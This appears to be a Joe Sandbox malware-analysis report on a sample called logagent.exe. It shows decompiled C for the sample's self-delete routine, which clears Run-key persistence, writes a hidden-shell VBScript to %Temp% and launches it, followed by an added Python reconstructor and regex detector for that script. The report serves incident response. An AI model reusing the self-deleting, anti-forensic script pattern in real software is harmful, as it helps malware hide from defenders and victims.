                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$C:\Windows\SysWOW64\logagent.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-3804875171
                                  • Opcode ID: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
                                  				signed int _v5;
                                  				char _v6;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				void* _v104;
                                  				void* _v120;
                                  				short _v640;
                                  				void* _t63;
                                  				char* _t65;
                                  				WCHAR* _t68;
                                  				char* _t69;
                                  				char* _t71;
                                  				char* _t74;
                                  				char* _t75;
                                  				char* _t76;
                                  				char* _t77;
                                  				signed int* _t79;
                                  				char* _t80;
                                  				char* _t81;
                                  				signed int _t82;
                                  				short* _t84;
                                  				char* _t85;
                                  				char* _t86;
                                  				WCHAR* _t88;
                                  				char* _t89;
                                  				char* _t90;
                                  				short* _t154;
                                  				void* _t161;
                                  				void* _t162;
                                  				void* _t164;
                                  				void* _t166;
                                  
                                  				_t63 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t63 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t63 = E0041050F(_t63);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E00412BEE(_t63);
                                  				}
                                  				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                  				_t162 = _t161 + 0x1c;
                                  				if(_t65 == 0) {
                                  					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t65);
                                  				_v5 = 1;
                                  				_t68 = SetFileAttributesW( &_v640, 0x80);
                                  				if(_t68 == 0) {
                                  					_v5 = _v5 & _t68;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t68 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t68, 0x80);
                                  				}
                                  				_t69 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                  				_t71 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                  				L0041416A();
                                  				_t164 = _t162 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                  				if(_v5 != 0) {
                                  					_t88 =  &_v640;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                  					_t89 =  &_v72;
                                  					L0041416A();
                                  					_t90 =  &_v24;
                                  					L00414146();
                                  					_t164 = _t164 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t154 = L"\"\n";
                                  				_t74 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                  				_t75 =  &_v72;
                                  				L00414146();
                                  				_t76 =  &_v56;
                                  				L00414146();
                                  				_t166 = _t164 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t76 != 0) {
                                  					_t85 =  &_v72;
                                  					L0041416A();
                                  					_t86 =  &_v56;
                                  					L00414146();
                                  					_t166 = _t166 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t77 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                  				_t79 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                  				_t80 =  &_v24;
                                  				L0041414C();
                                  				_t81 =  &_v72;
                                  				L0041414C();
                                  				_t82 =  &_v56;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                  				if(_t84 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                  					if(_t84 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t84;
                                  			}
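The routine above is the sample's uninstall/self-delete path: it removes its own entries under the HKCU and HKLM `...\CurrentVersion\Run\` and `...\Policies\Explorer\Run\` keys, resolves its executable path from the `exepath` registry value (falling back to GetModuleFileNameW), and then assembles a VBScript from the string literals listed in the report, writes it to `%Temp%\update.vbs` and launches it with ShellExecuteW before calling exit(0). The following Python is an added example, not part of the Joe Sandbox report or the sample: it renders the script as the decompiled control flow implies it is built (line order, and which lines are conditional, are inferred from the `_v5` and install-folder checks and are an assumption), and it scans arbitrary VBScript text for the same self-delete pattern so a responder can triage a recovered `update.vbs`. The executable path, install folder and cleanup command are constructed placeholders.

```python
# Added example (not from the report): reconstruct the self-delete VBScript the
# decompiled uninstall routine assembles from its string literals, and scan
# recovered .vbs text for that pattern. Line order is inferred from the
# decompiled control flow (assumption); all paths/commands below are constructed.
import re


def render_uninstall_vbs(exe_path: str, install_dir: str = "", cleanup_cmd: str = "",
                         wait_for_unlock: bool = True) -> str:
    """Return the VBScript text as the routine appears to build it.

    wait_for_unlock mirrors _v5: the while/wend loop is only emitted when
    SetFileAttributesW on the executable succeeded, so the script keeps
    retrying the delete until the (exiting) process releases the file.
    install_dir mirrors the string at 0x41bc68: DeleteFolder is only emitted
    when that string is non-empty.
    """
    lines = [
        'Set fso = CreateObject("Scripting.FileSystemObject")',
        "On Error Resume Next",
    ]
    if wait_for_unlock:
        lines.append(f'while fso.FileExists("{exe_path}")')
    lines.append(f'fso.DeleteFile "{exe_path}"')
    if wait_for_unlock:
        lines.append("wend")
    if install_dir:
        lines.append(f'fso.DeleteFolder "{install_dir}"')
    # "" inside a VBScript string literal is an escaped quote, so the shell
    # actually runs: cmd /c "<cleanup_cmd>"   (window style 0 = hidden)
    lines.append(f'CreateObject("WScript.Shell").Run "cmd /c ""{cleanup_cmd}""", 0')
    lines.append("fso.DeleteFile(Wscript.ScriptFullName)")
    return "\n".join(lines) + "\n"


# Indicators a responder would look for in a recovered %Temp%\update.vbs.
SELF_DELETE_INDICATORS = {
    "fso_created": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "wait_loop":   re.compile(r'while\s+fso\.FileExists\(', re.I),
    "deletes_self": re.compile(r'fso\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)', re.I),
    "hidden_shell": re.compile(r'WScript\.Shell"\)\.Run\s+".*",\s*0\s*$', re.I | re.M),
}


def scan_vbs(text: str) -> dict:
    """Flag VBScript that deletes itself after a delete-retry loop or a hidden shell."""
    hits = {name: bool(rx.search(text)) for name, rx in SELF_DELETE_INDICATORS.items()}
    hits["suspicious"] = hits["deletes_self"] and (hits["wait_loop"] or hits["hidden_shell"])
    return hits


if __name__ == "__main__":
    # Constructed sample values, not taken from the analysed file.
    script = render_uninstall_vbs(r"C:\Users\victim\AppData\Roaming\logagent.exe",
                                  r"C:\Users\victim\AppData\Roaming", "echo done")
    print(script)
    print(scan_vbs(script))
```

When hunting for this behaviour, pair the content scan with the drop location (`%Temp%\update.vbs`, launched via ShellExecuteW with the `open` verb from a process that exits immediately afterwards) and with RegDeleteKey / registry-value deletions under the three Run paths listed in the routine; the script alone is short-lived because its last line deletes it.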

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 30d0b3e98f787ee3ba42b6988a464d3848a7d6b1905986fedc43bf1a88a5ab0d
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 30d0b3e98f787ee3ba42b6988a464d3848a7d6b1905986fedc43bf1a88a5ab0d
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00408245() {
                                  				char _v0;
                                  				signed int _v5;
                                  				char _v6;
                                  				signed int _v9;
                                  				char _v10;
                                  				char _v24;
                                  				char _v28;
                                  				char _v40;
                                  				char _v44;
                                  				char _v56;
                                  				char _v60;
                                  				char _v72;
                                  				char _v76;
                                  				char _v88;
                                  				char _v92;
                                  				void* _v108;
                                  				void* _v124;
                                  				void _v606;
                                  				short _v608;
                                  				short _v644;
                                  				void* _t112;
                                  				void* _t114;
                                  				char* _t116;
                                  				WCHAR* _t118;
                                  				signed char _t120;
                                  				char* _t121;
                                  				char* _t123;
                                  				char* _t126;
                                  				char* _t127;
                                  				char* _t128;
                                  				short* _t131;
                                  				void* _t132;
                                  				char* _t134;
                                  				WCHAR* _t137;
                                  				char* _t138;
                                  				char* _t140;
                                  				char* _t143;
                                  				char* _t144;
                                  				char* _t145;
                                  				char* _t146;
                                  				signed int* _t148;
                                  				char* _t149;
                                  				char* _t150;
                                  				signed int _t151;
                                  				short* _t153;
                                  				char* _t154;
                                  				char* _t155;
                                  				WCHAR* _t157;
                                  				char* _t158;
                                  				char* _t159;
                                  				char* _t163;
                                  				WCHAR* _t165;
                                  				char* _t166;
                                  				char* _t167;
                                  				intOrPtr* _t174;
                                  				short* _t285;
                                  				void* _t297;
                                  				void* _t299;
                                  				void* _t301;
                                  				void* _t303;
                                  				void* _t304;
                                  				void* _t305;
                                  				void* _t306;
                                  				void* _t308;
                                  				void* _t310;
                                  
                                  				_t112 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t112 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t112 = E0041050F(_t112);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E00412BEE(_t112);
                                  				}
                                  				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				_v608 = _v608 & 0x00000000;
                                  				_t114 = memset( &_v606, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
